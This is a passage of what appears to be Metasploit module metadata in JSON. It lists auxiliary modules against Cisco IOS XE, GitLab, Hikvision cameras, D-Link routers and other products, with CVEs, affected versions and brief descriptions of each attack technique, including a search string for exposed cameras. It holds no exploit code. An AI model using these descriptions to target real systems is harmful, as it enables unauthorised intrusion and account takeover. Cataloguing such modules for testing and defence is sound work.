17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW", - "references": [ - "CVE-2023-20198", - "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z", - "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/", - "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml", - "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/", - "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb", - "is_install_path": true, - "ref_name": "admin/http/cisco_ios_xe_cli_exec_cve_2023_20198", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cisco_ios_xe_os_exec_cve_2023_20273": { - "name": "Cisco IOX XE unauthenticated OS command execution", - "fullname": "auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273", - "aliases": [], - 
"rank": 300, - "disclosure_date": "2023-10-16", - "type": "auxiliary", - "author": [ - "sfewer-r7" - ], - "description": "This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE\n devices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges.\n\n This module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user,\n CVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read\n back via the webserver. Finally the output file is deleted and the admin user is removed.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 
17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW\n\n NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even\n though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.", - "references": [ - "CVE-2023-20198", - "CVE-2023-20273", - "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z", - "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/", - "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml", - "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/", - "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/", - "URL-https://blog.leakix.net/2023/10/cisco-root-privesc/" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-03-27 16:51:16 +0000", - "path": "/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb", - "is_install_path": true, - "ref_name": "admin/http/cisco_ios_xe_os_exec_cve_2023_20273", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - 
"crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cisco_ssm_onprem_account": { - "name": "Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419)", - "fullname": "auxiliary/admin/http/cisco_ssm_onprem_account", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-07-20", - "type": "auxiliary", - "author": [ - "Michael Heinzl", - "Mohammed Adel" - ], - "description": "This module exploits an improper access control vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206. An unauthenticated remote attacker\n can change the password of any existing user, including administrative users.", - "references": [ - "CVE-2024-20419", - "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy#vp", - "URL-https://www.0xpolar.com/blog/CVE-2024-20419" - ], - "platform": "", - "arch": "", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-09-23 14:16:26 +0000", - "path": "/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb", - "is_install_path": true, - "ref_name": "admin/http/cisco_ssm_onprem_account", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cnpilot_r_cmd_exec": { - "name": "Cambium cnPilot r200/r201 Command Execution as 'root'", - "fullname": "auxiliary/admin/http/cnpilot_r_cmd_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Karn Ganeshen " - ], - "description": 
"Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to\n 4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell is\n accessible via a specific url, to any authenticated user. The module uses this\n shell to execute arbitrary system commands as 'root'.", - "references": [ - "CVE-2017-5259", - "URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/cnpilot_r_cmd_exec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cnpilot_r_fpt": { - "name": "Cambium cnPilot r200/r201 File Path Traversal", - "fullname": "auxiliary/admin/http/cnpilot_r_fpt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Karn Ganeshen " - ], - "description": "This module exploits a File Path Traversal vulnerability in Cambium\n cnPilot r200/r201 to read arbitrary files off the file system. 
Affected\n versions - 4.3.3-R4 and prior.", - "references": [ - "CVE-2017-5261", - "URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb", - "is_install_path": true, - "ref_name": "admin/http/cnpilot_r_fpt", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/contentkeeper_fileaccess": { - "name": "ContentKeeper Web Appliance mimencode File Access", - "fullname": "auxiliary/admin/http/contentkeeper_fileaccess", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module abuses the 'mimencode' binary present within\n ContentKeeper Web filtering appliances to retrieve arbitrary\n files outside of the webroot.", - "references": [ - "OSVDB-54551", - "URL-http://www.aushack.com/200904-contentkeeper.txt" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb", - "is_install_path": true, - "ref_name": "admin/http/contentkeeper_fileaccess", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/dlink_dir_300_600_exec_noauth": { - "name": "D-Link DIR-600 / DIR-300 Unauthenticated Remote Command 
Execution", - "fullname": "auxiliary/admin/http/dlink_dir_300_600_exec_noauth", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-02-04", - "type": "auxiliary", - "author": [ - "Michael Messner " - ], - "description": "This module exploits an OS Command Injection vulnerability in some D-Link\n Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n command.php, which is accessible without authentication. This module has been\n tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n In order to get a remote shell the telnetd could be started without any\n authentication.", - "references": [ - "OSVDB-89861", - "EDB-24453", - "URL-https://eu.dlink.com/uk/en/products/dir-600-wireless-n-150-home-router", - "URL-http://www.s3cur1ty.de/home-network-horror-days", - "URL-http://www.s3cur1ty.de/m1adv2013-003" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb", - "is_install_path": true, - "ref_name": "admin/http/dlink_dir_300_600_exec_noauth", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/dlink_dir_645_password_extractor": { - "name": "D-Link DIR 645 Password Extractor", - "fullname": "auxiliary/admin/http/dlink_dir_645_password_extractor", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Roberto Paleari ", - "Michael Messner " - ], - "description": "This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.\n With this vulnerability you are able to extract the password for the remote\n management.", - "references": [ - 
"OSVDB-90733", - "BID-58231", - "PACKETSTORM-120591" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb", - "is_install_path": true, - "ref_name": "admin/http/dlink_dir_645_password_extractor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/dlink_dsl320b_password_extractor": { - "name": "D-Link DSL 320B Password Extractor", - "fullname": "auxiliary/admin/http/dlink_dsl320b_password_extractor", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Michael Messner " - ], - "description": "This module exploits an authentication bypass vulnerability in D-Link DSL 320B\n <=v1.23. 
This vulnerability allows to extract the credentials for the remote\n management interface.", - "references": [ - "EDB-25252", - "OSVDB-93013", - "URL-http://www.s3cur1ty.de/m1adv2013-018" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb", - "is_install_path": true, - "ref_name": "admin/http/dlink_dsl320b_password_extractor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/foreman_openstack_satellite_priv_esc": { - "name": "Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment", - "fullname": "auxiliary/admin/http/foreman_openstack_satellite_priv_esc", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-06", - "type": "auxiliary", - "author": [ - "Ramon de C Valle " - ], - "description": "This module exploits a mass assignment vulnerability in the 'create'\n action of 'users' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier) by creating an arbitrary administrator\n account. 
For this exploit to work, your account must have 'create_users'\n permission (e.g., Manager role).", - "references": [ - "BID-60835", - "CVE-2013-2113", - "CWE-915", - "OSVDB-94655", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=966804", - "URL-https://projects.theforeman.org/issues/2630" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb", - "is_install_path": true, - "ref_name": "admin/http/foreman_openstack_satellite_priv_esc", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/fortra_filecatalyst_workflow_sqli": { - "name": "Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)", - "fullname": "auxiliary/admin/http/fortra_filecatalyst_workflow_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-06-25", - "type": "auxiliary", - "author": [ - "Tenable", - "Michael Heinzl" - ], - "description": "This module exploits a SQL injection vulnerability in Fortra FileCatalyst Workflow <= v5.1.6 Build 135, by adding a new\n administrative user to the web interface of the application.", - "references": [ - "CVE-2024-5276", - "URL-https://www.tenable.com/security/research/tra-2024-25", - "URL-https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-08-16 14:12:41 +0000", - "path": 
"/modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb", - "is_install_path": true, - "ref_name": "admin/http/fortra_filecatalyst_workflow_sqli", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/gitlab_password_reset_account_takeover": { - "name": "GitLab Password Reset Account Takeover", - "fullname": "auxiliary/admin/http/gitlab_password_reset_account_takeover", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-01-11", - "type": "auxiliary", - "author": [ - "h00die", - "asterion04" - ], - "description": "This module exploits an account-take-over vulnerability that allows users\n to take control of a gitlab account without user interaction.\n\n The vulnerability lies in the password reset functionality. Its possible to provide 2 emails\n and the reset code will be sent to both. It is therefore possible to provide the e-mail\n address of the target account as well as that of one we control, and to reset the password.\n\n 2-factor authentication prevents this vulnerability from being exploitable. 
There is no\n discernable difference between a vulnerable and non-vulnerable server response.\n\n Vulnerable versions include:\n 16.1 < 16.1.6,\n 16.2 < 16.2.9,\n 16.3 < 16.3.7,\n 16.4 < 16.4.5,\n 16.5 < 16.5.6,\n 16.6 < 16.6.4,\n and 16.7 < 16.7.2.", - "references": [ - "CVE-2023-7028", - "URL-https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/", - "URL-https://github.com/duy-31/CVE-2023-7028" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-27 07:44:11 +0000", - "path": "/modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb", - "is_install_path": true, - "ref_name": "admin/http/gitlab_password_reset_account_takeover", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/gitstack_rest": { - "name": "GitStack Unauthenticated REST API Requests", - "fullname": "auxiliary/admin/http/gitstack_rest", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-01-15", - "type": "auxiliary", - "author": [ - "Kacper Szurek", - "Jacob Robles" - ], - "description": "This modules exploits unauthenticated REST API requests in GitStack through v2.3.10.\n The module supports requests for listing users of the application and listing\n available repositories. Additionally, the module can create a user and add the user\n to the application's repositories. 
This module has been tested against GitStack v2.3.10.", - "references": [ - "CVE-2018-5955", - "EDB-43777", - "EDB-44044" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/gitstack_rest.rb", - "is_install_path": true, - "ref_name": "admin/http/gitstack_rest", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "CLEANUP", - "description": "Remove user from repositories and delete user" - }, - { - "name": "CREATE", - "description": "Create a user on the application" - }, - { - "name": "LIST", - "description": "List application users" - }, - { - "name": "LIST_REPOS", - "description": "List available repositories" - } - ] - }, - "auxiliary_admin/http/grafana_auth_bypass": { - "name": "Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth", - "fullname": "auxiliary/admin/http/grafana_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-08-14", - "type": "auxiliary", - "author": [ - "Rene Riedling", - "Sebastian Solnica" - ], - "description": "This module generates a remember me cookie for a valid username. Through unpropper seeding \n while userdate are requested from LDAP or OAuth it's possible to craft a valid remember me cookie. 
\n This cookie can be used for bypass authentication for everyone knowing a valid username.", - "references": [ - "CVE-2018-15727", - "URL-https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/" - ], - "platform": "", - "arch": "", - "rport": 3000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-09-29 01:28:56 +0000", - "path": "/modules/auxiliary/admin/http/grafana_auth_bypass.py", - "is_install_path": true, - "ref_name": "admin/http/grafana_auth_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/hikvision_unauth_pwd_reset_cve_2017_7921": { - "name": "Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic", - "fullname": "auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-09-23", - "type": "auxiliary", - "author": [ - "Monte Crypto", - "h00die-gr3y " - ], - "description": "Many Hikvision IP cameras contain improper authentication logic which allows unauthenticated impersonation of any configured user account.\n The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it\n affects many white-labeled camera products sold under a variety of brand names.\n\n Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time\n of publishing (shodan search: '\"App-webs\" \"200 OK\"'). Some of these devices can never be patched due to to the\n vendor preventing users from upgrading the installed firmware on the affected device.\n\n This module utilizes the bug in the authentication logic to perform an unauthenticated password change of any user account on\n a vulnerable Hikvision IP Camera. 
This can then be utilized to gain full administrative access to the affected device.", - "references": [ - "CVE-2017-7921", - "PACKETSTORM-144097", - "URL-https://ipvm.com/reports/hik-exploit", - "URL-https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921", - "URL-https://seclists.org/fulldisclosure/2017/Sep/23" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb", - "is_install_path": true, - "ref_name": "admin/http/hikvision_unauth_pwd_reset_cve_2017_7921", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/hp_web_jetadmin_exec": { - "name": "HP Web JetAdmin 6.5 Server Arbitrary Command Execution", - "fullname": "auxiliary/admin/http/hp_web_jetadmin_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-04-27", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module abuses a command execution vulnerability within the\n web based management console of the Hewlett-Packard Web JetAdmin\n network printer tool v6.2 - v6.5. It is possible to execute commands\n as SYSTEM without authentication. 
The vulnerability also affects POSIX\n systems, however at this stage the module only works against Windows.\n This module does not apply to HP printers.", - "references": [ - "OSVDB-5798", - "BID-10224", - "EDB-294" - ], - "platform": "", - "arch": "", - "rport": 8000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/hp_web_jetadmin_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/ibm_drm_download": { - "name": "IBM Data Risk Manager Arbitrary File Download", - "fullname": "auxiliary/admin/http/ibm_drm_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-04-21", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "IBM Data Risk Manager (IDRM) contains two vulnerabilities that can be chained by\n an unauthenticated attacker to download arbitrary files off the system.\n The first is an unauthenticated bypass, followed by a path traversal.\n This module exploits both vulnerabilities, giving an attacker the ability to download (non-root) files.\n A downloaded file is zipped, and this module also unzips it before storing it in the database.\n By default this module downloads Tomcat's application.properties files, which contains the\n database password, amongst other sensitive data.\n At the time of disclosure, this is was a 0 day, but IBM later patched it and released their advisory.\n Versions 2.0.2 to 2.0.4 are vulnerable, version 2.0.1 is not.", - "references": [ - "CVE-2020-4427", - "CVE-2020-4429", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md", - 
"URL-https://seclists.org/fulldisclosure/2020/Apr/33", - "URL-https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/" - ], - "platform": "", - "arch": "", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/http/ibm_drm_download.rb", - "is_install_path": true, - "ref_name": "admin/http/ibm_drm_download", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download arbitrary file" - } - ] - }, - "auxiliary_admin/http/idsecure_auth_bypass": { - "name": "Control iD iDSecure Authentication Bypass (CVE-2023-6329)", - "fullname": "auxiliary/admin/http/idsecure_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2023-11-27", - "type": "auxiliary", - "author": [ - "Michael Heinzl", - "Tenable" - ], - "description": "This module exploits an improper access control vulnerability (CVE-2023-6329) in Control iD iDSecure <= v4.7.43.0. 
It allows an\n unauthenticated remote attacker to compute valid credentials and to add a new administrative user to the web interface of the product.", - "references": [ - "CVE-2023-6329", - "URL-https://www.tenable.com/security/research/tra-2023-36" - ], - "platform": "", - "arch": "", - "rport": 30443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-08-19 21:17:16 +0000", - "path": "/modules/auxiliary/admin/http/idsecure_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/http/idsecure_auth_bypass", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/iis_auth_bypass": { - "name": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass", - "fullname": "auxiliary/admin/http/iis_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-02", - "type": "auxiliary", - "author": [ - "Soroush Dalili", - "sinn3r " - ], - "description": "This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it 